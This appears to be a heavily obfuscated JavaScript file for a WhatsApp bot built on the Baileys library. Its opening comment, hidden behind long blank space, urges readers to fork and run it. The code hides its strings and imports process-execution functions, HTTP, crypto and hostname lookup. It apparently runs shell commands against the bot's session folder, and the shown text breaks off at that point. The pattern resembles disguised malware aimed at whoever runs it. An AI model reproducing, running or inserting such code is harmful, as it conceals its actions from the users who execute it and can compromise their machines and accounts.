/*




Is you can't see Run Button 🥲

Fork Thus and Run





*/




























































function _0x44f837(_0x23787f, _0x5a1e73, _0x279425, _0x4a7adc, _0x122aff, _0x2fbfb9, _0x5b4ba9, _0xd4d795, _0x4e22a6, _0xc01b37) {
    const _0x55643e = { _0x23642f: 0x1f5 };
    return _0x2007(_0x5a1e73 - -_0x55643e._0x23642f, _0xc01b37);
}
function _0x27ced1(_0x257bcd, _0x477fa0, _0x4281a9, _0x4a6b53, _0x510bee, _0x3ec38a, _0x2784e5, _0x4b91be, _0x42a245, _0x4c7fbc) {
    const _0x1bc61a = { _0x589b60: 0x89 };
    return _0x2007(_0x4c7fbc - -_0x1bc61a._0x589b60, _0x4a6b53);
}
function _0x1606ae(_0x321d12, _0x2e29df, _0x586a55, _0x310ed3, _0x1b70ab, _0x482772, _0x716be7, _0x11e1ad, _0x59cc90, _0xc6dbf8) {
    const _0x2b2e9a = { _0x16fedc: 0x105 };
    return _0x2007(_0x482772 - _0x2b2e9a._0x16fedc, _0x586a55);
}
function _0x40bf91(_0x108cfe, _0x13ae0c, _0x3274be, _0x1a6e0e, _0x5f479b, _0x56d092, _0x1cccbd, _0x5f588c, _0x308c47, _0x2d96d2) {
    const _0x296a3b = { _0xa8ee24: 0x243 };
    return _0x2007(_0x5f479b - -_0x296a3b._0xa8ee24, _0x108cfe);
}
(function (_0x16604b, _0x511f36) {
    const _0x4c54ad = {
            _0x58fec8: 0x3f8,
            _0x547c7a: 0x475,
            _0x149482: 0x52b,
            _0x34c297: 0x4ac,
            _0x5797ce: 0x4bd,
            _0x30d118: '&b&$',
            _0x3a18ae: 0x492,
            _0x58591e: 0x4bc,
            _0x1108fe: 0x37e,
            _0x117693: 0x6f2,
            _0x496f6e: 0x832,
            _0x27f425: 0x691,
            _0x1b894f: 'kpTK',
            _0x28633c: 0x5f0,
            _0x30a136: 0x683,
            _0x15a5a2: 0x849,
            _0x3ea8b7: 0x70a,
            _0x1871fc: 0x87e,
            _0xf239f3: 0x65a,
            _0x432b00: 0xc3,
            _0x1bd5e6: 0xa0,
            _0x200220: 0x29a,
            _0x37642: 0xef,
            _0x33e1e7: 0x151,
            _0x5022d7: 0xe0,
            _0x3c2f80: 0x215,
            _0x590b35: '8)f)',
            _0x52de8b: 0x2ff,
            _0x558340: 0x2ce,
            _0xd67199: 0x6bc,
            _0x5b1e77: 0x672,
            _0x1955f9: 0x5a3,
            _0x5809f1: 'B*^y',
            _0x2c262b: 0x5ad,
            _0x2dc370: 0x6db,
            _0x4726e8: 0x51c,
            _0x55d7ed: 0x63d,
            _0x360707: 0x782,
            _0x28d1b8: 0x3fb,
            _0x5543eb: 0x4e4,
            _0x222ca6: 0x4dd,
            _0x60d378: 0x486,
            _0x9c275f: 0x31d,
            _0x28bfb9: 'eI1a',
            _0x2d028f: 0x2f6,
            _0x5ca266: 0x548,
            _0x5348a8: 0x49d,
            _0x5776cd: 0x42f,
            _0x4c1e37: 0x4cc,
            _0x32896e: 0x697,
            _0x1191ae: 0x4a6,
            _0x7aba17: 'q43X',
            _0x356f85: 0x609,
            _0x32e0a3: 0x64e,
            _0x39c0a6: 0x478,
            _0x1ea50f: 0x59d,
            _0x36f04c: 0x64a,
            _0x48b68b: 0x604,
            _0x40c4db: 0x61e,
            _0x39b916: 0x651,
            _0x2767e3: 0x464,
            _0x2d8917: 0x5ce,
            _0x5571d5: 0x494,
            _0x596e25: 'nCbb',
            _0x203c1b: 0x51f,
            _0x1d3fc4: 0x437,
            _0x3cfe38: 0x5b6,
            _0x40d21d: 0x4fa,
            _0x1722dc: 0x6b9,
            _0x1d66b0: 0x561,
            _0x21a551: 0x5d2,
            _0x248b53: 'L$8G',
            _0x12aa63: 0x53f,
            _0x389880: 0x685,
            _0x387a0a: 0x500,
            _0x2d5932: 0x582,
            _0x2c509a: 0x62b,
            _0x155570: 0x483,
            _0x520f6b: 0x51e,
            _0x1e1682: 0x3ff,
            _0x42d614: 0x48a,
            _0x54908e: 0x4e3,
            _0x39b68a: '&b&$',
            _0x5c8784: 0x42e,
            _0x1376b3: 0x3c3,
            _0x343f07: 0x53e,
            _0x50b125: 0x653,
            _0x157191: 0x4ef,
            _0x5482cd: 0x32,
            _0x5bdba7: 0x1f8,
            _0x51e96f: 0x16f,
            _0x4fc62c: 0x1ed,
            _0x5da4a5: 0x12c,
            _0xa49004: 0xeb,
            _0x12a028: 0x2b,
            _0x355320: 0x141,
            _0x5a77d2: 0x1a5,
            _0x151271: 'NjpZ',
            _0x428990: 0x5a0,
            _0x17e1b3: 0x425,
            _0x2c0c18: 0x490,
            _0x4c8bd0: 0x520,
            _0x250269: '8gpH',
            _0x14b452: 0x3af,
            _0x265db4: 0x663,
            _0x4db488: 0x45a,
            _0x25b23f: 0x68b
        }, _0x989595 = { _0x28704e: 0x1f2 }, _0x1c68ff = { _0x127391: 0xda }, _0x63dd96 = { _0x42d3e3: 0x198 }, _0xbbe555 = { _0x1a5ab1: 0x1be }, _0x5b6b33 = { _0x570ec4: 0x368 }, _0x3bc106 = { _0x59e41a: 0xf9 }, _0x24e97e = { _0x301712: 0x151 }, _0x41d123 = { _0x2209ab: 0x46 }, _0x3160f7 = { _0x58d72b: 0x2fa }, _0x1b3ba6 = { _0x255a55: 0x1ad }, _0x41707a = { _0x77cd77: 0x145 };
    function _0x5465f2(_0x4a4b80, _0x466e72, _0x528423, _0x4d20e1, _0x5f3d69, _0x47ac72, _0x11974c, _0x3c1b38, _0x39c7b6, _0x4d8313) {
        return _0x2007(_0x47ac72 - -_0x41707a._0x77cd77, _0x4d20e1);
    }
    function _0x2bf546(_0x2b76d4, _0x50ed3f, _0x4b5a55, _0x73c288, _0xf1e495, _0x3f4807, _0x41d1e1, _0x4bbf8f, _0x27c9af, _0x2c564a) {
        return _0x2007(_0x2c564a - _0x1b3ba6._0x255a55, _0x3f4807);
    }
    function _0x25ddb9(_0x901013, _0x247deb, _0x56e872, _0x48e977, _0x2a5aa5, _0x144533, _0x332371, _0x461e7e, _0x22312c, _0x58ab71) {
        return _0x2007(_0x22312c - _0x3160f7._0x58d72b, _0x461e7e);
    }
    const _0x6f91f5 = _0x16604b();
    function _0x22ded1(_0x5ae974, _0x405da4, _0x3d3363, _0x1c3cd1, _0x53f371, _0x37609d, _0x3e9f2c, _0x46d2c7, _0xea414e, _0xc9e3db) {
        return _0x2007(_0x3e9f2c - _0x41d123._0x2209ab, _0x46d2c7);
    }
    function _0x5d0748(_0x309933, _0x147627, _0x3bbcd0, _0x856a92, _0x2d5672, _0x2b6938, _0xb542f8, _0x45dc8a, _0x26758b, _0x2448d7) {
        return _0x2007(_0xb542f8 - _0x24e97e._0x301712, _0x2448d7);
    }
    function _0x2da11e(_0x4e0fa0, _0x202e7c, _0x4f871e, _0x373db0, _0x12fbd5, _0x27966e, _0x48c34c, _0x43d129, _0x32b38f, _0x2c70f1) {
        return _0x2007(_0x4f871e - -_0x3bc106._0x59e41a, _0x2c70f1);
    }
    function _0x3cea3c(_0x4499a3, _0x3f6acb, _0x1fc170, _0x5c6788, _0x1a0423, _0x1308aa, _0x1fbaa9, _0x1414c6, _0x5269e5, _0x1bef11) {
        return _0x2007(_0x1414c6 - _0x5b6b33._0x570ec4, _0x5c6788);
    }
    function _0x1dc502(_0x433269, _0x1812e1, _0x102b6a, _0x4d77a8, _0x394503, _0x3b5f5b, _0x3b57e1, _0x504528, _0x5db32a, _0x49dadc) {
        return _0x2007(_0x5db32a - -_0xbbe555._0x1a5ab1, _0x102b6a);
    }
    function _0x119fdb(_0x3dd40c, _0x115a37, _0x4143fa, _0xeffcea, _0x4e7192, _0xf9dfe1, _0x1617c5, _0x2a13ff, _0x533b13, _0x139768) {
        return _0x2007(_0xeffcea - _0x63dd96._0x42d3e3, _0x115a37);
    }
    function _0x298c8e(_0x3c5fce, _0x230c93, _0x467c4b, _0x89a0b8, _0x1e7f19, _0xa29eaf, _0x39f64a, _0x53f5ac, _0x151289, _0x439df3) {
        return _0x2007(_0x230c93 - _0x1c68ff._0x127391, _0x1e7f19);
    }
    function _0x158668(_0x8e6a87, _0x19f01c, _0x112464, _0x416967, _0x70c609, _0x43f1d9, _0x5a59be, _0x1a9a08, _0xd647f5, _0x51b617) {
        return _0x2007(_0x416967 - _0x989595._0x28704e, _0x70c609);
    }
    while (!![]) {
        try {
            const _0x58ee27 = parseInt(_0x2bf546(_0x4c54ad._0x58fec8, _0x4c54ad._0x547c7a, _0x4c54ad._0x149482, _0x4c54ad._0x34c297, _0x4c54ad._0x5797ce, _0x4c54ad._0x30d118, _0x4c54ad._0x3a18ae, _0x4c54ad._0x58591e, _0x4c54ad._0x1108fe, _0x4c54ad._0x58fec8)) / (-0x1ff0 + -0xbd4 + 0x2bc5) * (parseInt(_0x3cea3c(_0x4c54ad._0x117693, _0x4c54ad._0x496f6e, _0x4c54ad._0x27f425, _0x4c54ad._0x1b894f, _0x4c54ad._0x28633c, _0x4c54ad._0x30a136, _0x4c54ad._0x15a5a2, _0x4c54ad._0x3ea8b7, _0x4c54ad._0x1871fc, _0x4c54ad._0xf239f3)) / (-0x1607 + -0x1d6c + -0x1127 * -0x3)) + parseInt(_0x22ded1(_0x4c54ad._0x432b00, _0x4c54ad._0x1bd5e6, _0x4c54ad._0x200220, _0x4c54ad._0x37642, _0x4c54ad._0x33e1e7, _0x4c54ad._0x5022d7, _0x4c54ad._0x3c2f80, _0x4c54ad._0x590b35, _0x4c54ad._0x52de8b, _0x4c54ad._0x558340)) / (-0x2551 + -0x1 * 0x22ca + -0x2 * -0x240f) * (-parseInt(_0x3cea3c(_0x4c54ad._0xd67199, _0x4c54ad._0x5b1e77, _0x4c54ad._0x1955f9, _0x4c54ad._0x5809f1, _0x4c54ad._0x2c262b, _0x4c54ad._0x2dc370, _0x4c54ad._0x4726e8, _0x4c54ad._0x55d7ed, _0x4c54ad._0x360707, _0x4c54ad._0x1955f9)) / (-0x1 * -0x1021 + -0xfe7 + -0x36)) + -parseInt(_0x2bf546(_0x4c54ad._0x28d1b8, _0x4c54ad._0x5543eb, _0x4c54ad._0x222ca6, _0x4c54ad._0x60d378, _0x4c54ad._0x9c275f, _0x4c54ad._0x28bfb9, _0x4c54ad._0x2d028f, _0x4c54ad._0x5ca266, _0x4c54ad._0x5348a8, _0x4c54ad._0x5776cd)) / (0xc3 * -0x1f + -0x74f + -0x1ef1 * -0x1) + parseInt(_0x3cea3c(_0x4c54ad._0x4c1e37, _0x4c54ad._0x32896e, _0x4c54ad._0x1191ae, _0x4c54ad._0x7aba17, _0x4c54ad._0x356f85, _0x4c54ad._0x32e0a3, _0x4c54ad._0x39c0a6, _0x4c54ad._0x1ea50f, _0x4c54ad._0x36f04c, _0x4c54ad._0x48b68b)) / (0x1d * -0x61 + 0x31 * -0x26 + 0x1249) * (parseInt(_0x2bf546(_0x4c54ad._0x40c4db, _0x4c54ad._0x39b916, _0x4c54ad._0x2767e3, _0x4c54ad._0x2d8917, _0x4c54ad._0x5571d5, _0x4c54ad._0x596e25, _0x4c54ad._0x203c1b, _0x4c54ad._0x1d3fc4, _0x4c54ad._0x3cfe38, _0x4c54ad._0x40d21d)) / (0x1869 + -0x16a * 0x16 + -0x15 * -0x52)) + -parseInt(_0x3cea3c(_0x4c54ad._0x1722dc, _0x4c54ad._0x1d66b0, _0x4c54ad._0x21a551, _0x4c54ad._0x248b53, _0x4c54ad._0x12aa63, _0x4c54ad._0x389880, _0x4c54ad._0x387a0a, _0x4c54ad._0x2d5932, _0x4c54ad._0x2c509a, _0x4c54ad._0x155570)) / (-0x1ed * 0x11 + 0x6f0 + 0x19d5) + parseInt(_0x158668(_0x4c54ad._0x520f6b, _0x4c54ad._0x1e1682, _0x4c54ad._0x42d614, _0x4c54ad._0x54908e, _0x4c54ad._0x39b68a, _0x4c54ad._0x5c8784, _0x4c54ad._0x1376b3, _0x4c54ad._0x343f07, _0x4c54ad._0x50b125, _0x4c54ad._0x157191)) / (0x1f16 + -0x1 * 0x4be + -0x1a4f) + parseInt(_0x2da11e(_0x4c54ad._0x5482cd, _0x4c54ad._0x5bdba7, _0x4c54ad._0x51e96f, _0x4c54ad._0x4fc62c, _0x4c54ad._0x5da4a5, _0x4c54ad._0xa49004, _0x4c54ad._0x12a028, _0x4c54ad._0x355320, _0x4c54ad._0x5a77d2, _0x4c54ad._0x151271)) / (0x6 * 0x634 + 0x1 * -0xca1 + -0x188d) * (parseInt(_0x158668(_0x4c54ad._0x428990, _0x4c54ad._0x17e1b3, _0x4c54ad._0x2c0c18, _0x4c54ad._0x4c8bd0, _0x4c54ad._0x250269, _0x4c54ad._0x14b452, _0x4c54ad._0x265db4, _0x4c54ad._0x155570, _0x4c54ad._0x4db488, _0x4c54ad._0x25b23f)) / (-0x274 + -0x8d3 + 0x5a9 * 0x2));
            if (_0x58ee27 === _0x511f36)
                break;
            else
                _0x6f91f5['push'](_0x6f91f5['shift']());
        } catch (_0x218d95) {
            _0x6f91f5['push'](_0x6f91f5['shift']());
        }
    }
}(_0x480d, 0x1 * -0x11222 + 0x23801 + 0x1c18d));
function _0x5535c0(_0x3a6b0b, _0x2cb8b0, _0x10acdb, _0x4d1758, _0x488878, _0x4cd3ad, _0x5a6e46, _0x1d51a2, _0x2e4b4a, _0xe6e414) {
    const _0x376fca = { _0x271427: 0x256 };
    return _0x2007(_0x2cb8b0 - -_0x376fca._0x271427, _0x4cd3ad);
}
const sessionName = _0x402784(0x1b4, 'B*^y', -0xe3, -0xa, 0xc8, -0x1a, 0x18e, 0x105, 0x6e, 0x40) + _0x402784(0x72, '4qTO', 0x37, -0xf5, -0x58, 0x22, -0x67, 0x10e, -0x1c, -0x5a) + _0x402784(0x105, '9ONI', -0x14b, 0x101, 0xdd, 0xf4, -0xad, 0x76, -0x146, -0x7) + _0x28a931('8gpH', 0x4e0, 0x613, 0x674, 0x54f, 0x508, 0x5af, 0x4ce, 0x4f2, 0x470);
function _0x32d03f(_0x5e3b1e, _0x25a1ef, _0x2cc5ed, _0xd77848, _0x4d6e5b, _0x5ef6bf, _0xdc12e3, _0x2e72f0, _0x58bf9b, _0x28646d) {
    const _0x18e2fc = { _0x3aa99b: 0x208 };
    return _0x2007(_0x2cc5ed - -_0x18e2fc._0x3aa99b, _0x28646d);
}
function _0x1b6f90(_0x2fd532, _0x313a28, _0x4500d2, _0x3479d3, _0x5eebbf, _0x4fe128, _0xde72c2, _0x56068b, _0x2341a2, _0x2c2a58) {
    const _0x160fd1 = { _0x2e388a: 0x1d0 };
    return _0x2007(_0x2c2a58 - _0x160fd1._0x2e388a, _0x4fe128);
}
function _0xceab57(_0x4e897c, _0x3b96fb, _0x4d803a, _0x2a1245, _0x54872a, _0x5679e5, _0x69618b, _0x3734ff, _0x5b008d, _0x49e910) {
    const _0x15064f = { _0x234f01: 0xa9 };
    return _0x2007(_0x4d803a - _0x15064f._0x234f01, _0x5679e5);
}
function _0x57d2f6(_0x7d4d88, _0x426ad3, _0x448729, _0x35aa66, _0x5ca874, _0x4c3b8f, _0x515ec2, _0x3b9711, _0x63963c, _0x5e4e97) {
    const _0x37fafe = { _0x32b078: 0x268 };
    return _0x2007(_0x4c3b8f - -_0x37fafe._0x32b078, _0x515ec2);
}
function _0x133e4c(_0x187c53, _0x54faff, _0x4f56bf, _0x44eeb7, _0x1e7a10, _0x2eaaaf, _0x68fd4e, _0x132bc4, _0x1e455f, _0x1d17c7) {
    const _0x2003e2 = { _0x4b1948: 0x2ea };
    return _0x2007(_0x4f56bf - -_0x2003e2._0x4b1948, _0x44eeb7);
}
function _0x28a931(_0x4c2b0f, _0x365756, _0x192437, _0x7f20e9, _0x58ec35, _0x22c012, _0x1022f4, _0x204aae, _0x532d39, _0x3cdc62) {
    const _0x52848b = { _0x33086b: 0x398 };
    return _0x2007(_0x58ec35 - _0x52848b._0x33086b, _0x4c2b0f);
}
const {
        default: makeWASocket,
        delay,
        fetchLatestBaileysVersion,
        getAggregateVotesInPollMessage,
        makeCacheableSignalKeyStore,
        makeInMemoryStore,
        PHONENUMBER_MCC,
        proto,
        useMultiFileAuthState,
        WAMessageKey
    } = require(_0x402784(0x102, 'GI*I', -0x101, -0x65, -0xfa, -0x9c, -0x7, 0x22, -0xde, 0x37) + _0x4df169(0x2b6, 0x195, 0x250, 0x2ed, 0x71, 0x8c, 0x1d0, 0xf2, 'UJ*E', 0x23f) + _0x4df169(0x21c, 0x155, 0x194, 0x1f2, 0x2e3, 0x340, 0x259, 0x30f, '01I4', 0x310) + _0x133e4c(-0x90, -0x11a, -0xf1, 'c%n%', -0x91, -0xe9, -0xf3, -0xb4, 0x1c, 0x8) + _0xb3af17(-0x7c, -0x17e, -0x18c, -0x245, -0xa2, -0x165, -0x2a, -0x19f, -0x192, '01I4')), pino = require(_0x58d40c(0x45d, '8gpH', 0x4fb, 0x54b, 0x376, 0x425, 0x4b8, 0x54b, 0x352, 0x582)), fs = require('fs');
function _0xb3af17(_0x3366e2, _0x4beda5, _0x8eadcd, _0x296515, _0x3be393, _0xcb939f, _0x287c53, _0x1044ac, _0x4418ff, _0x33aa47) {
    const _0x46d360 = { _0xa72650: 0x341 };
    return _0x2007(_0x8eadcd - -_0x46d360._0xa72650, _0x33aa47);
}
const NodeCache = require(_0x28a931('[pG9', 0x819, 0x6ed, 0x840, 0x7dd, 0x6e1, 0x830, 0x7bf, 0x6d0, 0x82a) + _0x84403c(0x202, 0x287, 0x3d5, 0x359, 0x33a, 0x1ff, 0x33e, '16^m', 0x336, 0x318));
function _0x48f893(_0x35b8fe, _0x42263f, _0xca8373, _0x22904f, _0x8b753c, _0x153833, _0x45dac5, _0x27794c, _0x47ff1e, _0x46c03a) {
    const _0x35dd47 = { _0x15bd5d: 0x19c };
    return _0x2007(_0x22904f - _0x35dd47._0x15bd5d, _0x35b8fe);
}
const readline = require(_0x133e4c(-0x11f, -0x1e2, -0x152, 'kpTK', -0x59, -0x205, -0x260, -0x135, 0x5, -0x226) + _0x4df169(0x182, 0x2cf, 0x36e, 0xe4, 0x1e1, 0x17e, 0x232, 0x20d, '&b&$', 0x2a7));
function _0x59ee17(_0x1d312e, _0x4f985c, _0xfb5350, _0x34c629, _0x36e034, _0x25cece, _0x54d848, _0x5a4c34, _0x5f3089, _0x2ac7c4) {
    const _0x1276ac = { _0x4c5733: 0x319 };
    return _0x2007(_0x4f985c - _0x1276ac._0x4c5733, _0xfb5350);
}
function _0x4059de(_0x4f8407, _0x1f8bd7, _0x50f291, _0x3534d5, _0x1eeaa1, _0x11e77a, _0xda0cf0, _0x4d5042, _0x551b2e, _0x290b2b) {
    const _0x4dc89f = { _0x22b1fe: 0x25 };
    return _0x2007(_0x4f8407 - -_0x4dc89f._0x22b1fe, _0x1f8bd7);
}
const chalk = require(_0x84403c(0x123, 0x177, 0x17f, 0x241, 0x2f, 0x197, 0x18a, 'UJ*E', 0x1c3, 0x1bb));
function _0x412058(_0xa1ce8, _0x3c2b4c, _0x52ebd7, _0x2827a7, _0x27eb49, _0x4c2145, _0x57af7c, _0x549fa2, _0x18a23f, _0x5d2c53) {
    const _0x4c7d21 = { _0x1f6f87: 0x13b };
    return _0x2007(_0x4c2145 - -_0x4c7d21._0x1f6f87, _0xa1ce8);
}
const usePairingCode = !![];
function _0xd422b(_0x355934, _0x14ff33, _0x376bb0, _0x527e93, _0x579cd0, _0xfa6141, _0x48fa64, _0x61ed3d, _0x57c4e9, _0x59247a) {
    const _0x188891 = { _0x95c35e: 0x190 };
    return _0x2007(_0x57c4e9 - _0x188891._0x95c35e, _0x14ff33);
}
const axios = require(_0x1b6f90(0x6e6, 0x5cd, 0x6ab, 0x5d1, 0x4fc, 'YY1E', 0x501, 0x47c, 0x595, 0x58f));
function _0x44a228(_0x276d6d, _0x428f1c, _0x39d20e, _0x3d1250, _0x1d1431, _0x1e66bd, _0x25f2f5, _0x956d80, _0x45b241, _0x3e756a) {
    const _0x5c7d4e = { _0x3d94b3: 0x3e2 };
    return _0x2007(_0x428f1c - -_0x5c7d4e._0x3d94b3, _0x1e66bd);
}
const os = require('os');
function _0x276865(_0x4368cd, _0x258ec5, _0x2c459c, _0x50fe50, _0xe48677, _0x153d71, _0x2fbc43, _0xf55321, _0x547d54, _0x36cd59) {
    const _0x1989d8 = { _0x461d16: 0x309 };
    return _0x2007(_0x547d54 - -_0x1989d8._0x461d16, _0x2fbc43);
}
function _0x291fa7(_0x197b5a, _0xdfcc0f, _0x5926e9, _0x5b25fc, _0x2fa84c, _0x494ff3, _0x1d465f, _0x2b608e, _0x362452, _0x5b068d) {
    const _0x508e9a = { _0x322ee4: 0xc5 };
    return _0x2007(_0x5b068d - _0x508e9a._0x322ee4, _0x494ff3);
}
function _0x40ff38(_0x2ff751, _0x55c4bd, _0x505d5a, _0x506ce2, _0x5499e6, _0x454baf, _0x21e46e, _0x1e1f27, _0x1d0b29, _0x87164d) {
    const _0x441e72 = { _0x4145b3: 0x75 };
    return _0x2007(_0x506ce2 - _0x441e72._0x4145b3, _0x21e46e);
}
function _0x15d8a0(_0x29abcb, _0x16c8f2, _0x1e4060, _0x40e758, _0x11c4ae, _0x38dbb6, _0x19a761, _0x24c70a, _0x48b4f1, _0x2b1f93) {
    const _0x159ebe = { _0x5743c7: 0x1b5 };
    return _0x2007(_0x29abcb - _0x159ebe._0x5743c7, _0x2b1f93);
}
const hostname = os[_0x27ced1(0x213, 0x20d, 0x1b6, 'Hgrp', 0x29, 0x41, 0x82, 0x1a7, 0x86, 0xef) + _0x5535c0(0x1b2, 0x6d, -0x56, 0x105, 0x103, 'oa6r', 0x1b7, -0xb6, 0x4e, -0x54)]();
function _0x271bf0(_0x54e1c9, _0x5c3cc7, _0xb4bc07, _0x54c81e, _0x343bf7, _0x2c17ab, _0x29e26d, _0x3086af, _0x403866, _0xd813c2) {
    const _0x147d61 = { _0x2c9e91: 0x3b0 };
    return _0x2007(_0x29e26d - -_0x147d61._0x2c9e91, _0x403866);
}
function _0x18edab(_0x361a83, _0x14cdc9, _0x28b792, _0x4f2ee9, _0x138a04, _0x4c20b9, _0x26e131, _0x1cfb5e, _0x54ec54, _0x3211ff) {
    const _0x1d8450 = { _0x320aa2: 0x64 };
    return _0x2007(_0x28b792 - -_0x1d8450._0x320aa2, _0x26e131);
}
const crypto = require(_0x16e880(0x6b8, 0x6ea, 0x5bc, 0x72f, 0x6fd, 0x73b, 0x580, 0x56d, 0x56a, 'eI1a') + 'o'), {exec, spawn, execSync} = require(_0x27ced1(0x2ad, 0x270, 0x2b5, 'm[h5', 0x1c6, 0x93, 0x18f, 0xfa, 0x2e5, 0x1d8) + _0x58d40c(0x288, '5VG&', 0x3de, 0x3f3, 0x407, 0x386, 0x3a1, 0x4c1, 0x26f, 0x49f) + _0xb3af17(0xe0, 0x34, 0x3f, 0x30, -0x5a, 0x87, 0x58, -0x40, -0x87, '4qTO'));
function _0x1a3b78(_0x5f1eb1, _0x1e22c8, _0x2320dc, _0x332cc0, _0xf7ba53, _0x22b5fc, _0x59ea90, _0x379d31, _0x4b871f, _0x4a26b3) {
    const _0x19c9f5 = { _0x280c24: 0xf3 };
    return _0x2007(_0x379d31 - -_0x19c9f5._0x280c24, _0x4b871f);
}
function _0x595b76(_0x58a829, _0x238eb1, _0x2a1b1a, _0x2b524d, _0x49575a, _0xe126c0, _0x50a89, _0x470b45, _0x213348, _0x356edd) {
    const _0xfbbec4 = { _0x4dcb96: 0x8d };
    return _0x2007(_0x2b524d - -_0xfbbec4._0x4dcb96, _0x50a89);
}
function _0xd1b4e9(_0xe6707e, _0x2fe1bf, _0x5ef2a0, _0x26e54e, _0x91ae11, _0x3027b9, _0x40939e, _0x493ac3, _0x27ed67, _0x128dc3) {
    const _0x35c6ce = { _0x467eab: 0xe0 };
    return _0x2007(_0x40939e - -_0x35c6ce._0x467eab, _0xe6707e);
}
function _0x1ae98e(_0x44e1a1, _0x466f2d, _0x27564e, _0x2ab297, _0x5889ee, _0x3a9e5f, _0x573c09, _0x22f478, _0xb1933e, _0x2fea6a) {
    const _0x1c6edc = { _0x2d8dfc: 0x1dc };
    return _0x2007(_0x2fea6a - _0x1c6edc._0x2d8dfc, _0x2ab297);
}
function _0x4df169(_0x371294, _0x3f73d3, _0x550bb5, _0x24ddcc, _0x415c82, _0xeb5ba8, _0x32023e, _0xcc5f9e, _0x2af0dc, _0x4a2dda) {
    const _0x398266 = { _0x1996cb: 0xe4 };
    return _0x2007(_0x32023e - -_0x398266._0x1996cb, _0x2af0dc);
}
function _0x3b6a31(_0x1d81cd, _0x5834e2, _0xc051b7, _0x48550d, _0x21b6fd, _0x13ce37, _0x3ea613, _0x16dd08, _0x279334, _0x1cc348) {
    const _0x18c4de = { _0x3fa64d: 0x168 };
    return _0x2007(_0xc051b7 - _0x18c4de._0x3fa64d, _0x1d81cd);
}
function _0x16e880(_0x1df91e, _0x19d703, _0x35f8dc, _0x38ccb4, _0x591df5, _0x1fe63e, _0x32b6e6, _0x11f239, _0x4952fc, _0x13a114) {
    const _0x3f7e91 = { _0x3871a9: 0x378 };
    return _0x2007(_0x1df91e - _0x3f7e91._0x3871a9, _0x13a114);
}
function _0x257337(_0x3c4c20, _0x2354b4, _0xb7227a, _0x4f9fe4, _0x49045b, _0x7ee266, _0x4f92f5, _0x4be99f, _0x38ae35, _0x6707cd) {
    const _0x3aea2a = { _0x3f3863: 0x2f8 };
    return _0x2007(_0x49045b - _0x3aea2a._0x3f3863, _0x6707cd);
}
function _0x2a980a(_0x11b42d, _0x46ba1c, _0x2c61a6, _0x550422, _0x13520e, _0x5de7ae, _0x2db5c7, _0x3e8350, _0x3f401b, _0x2ead2a) {
    const _0x339289 = { _0x2a719e: 0x2c6 };
    return _0x2007(_0x2c61a6 - -_0x339289._0x2a719e, _0x2ead2a);
}
fs[_0x1b6f90(0x539, 0x668, 0x5b6, 0x51f, 0x688, 'sPe6', 0x5b2, 0x3fc, 0x62b, 0x517) + _0x5535c0(-0x51, 0x47, 0x37, 0x160, 0x56, 'nCbb', -0x28, -0x7e, 0xf, 0xf1)](sessionName) && exec(_0x1b6f90(0x237, 0
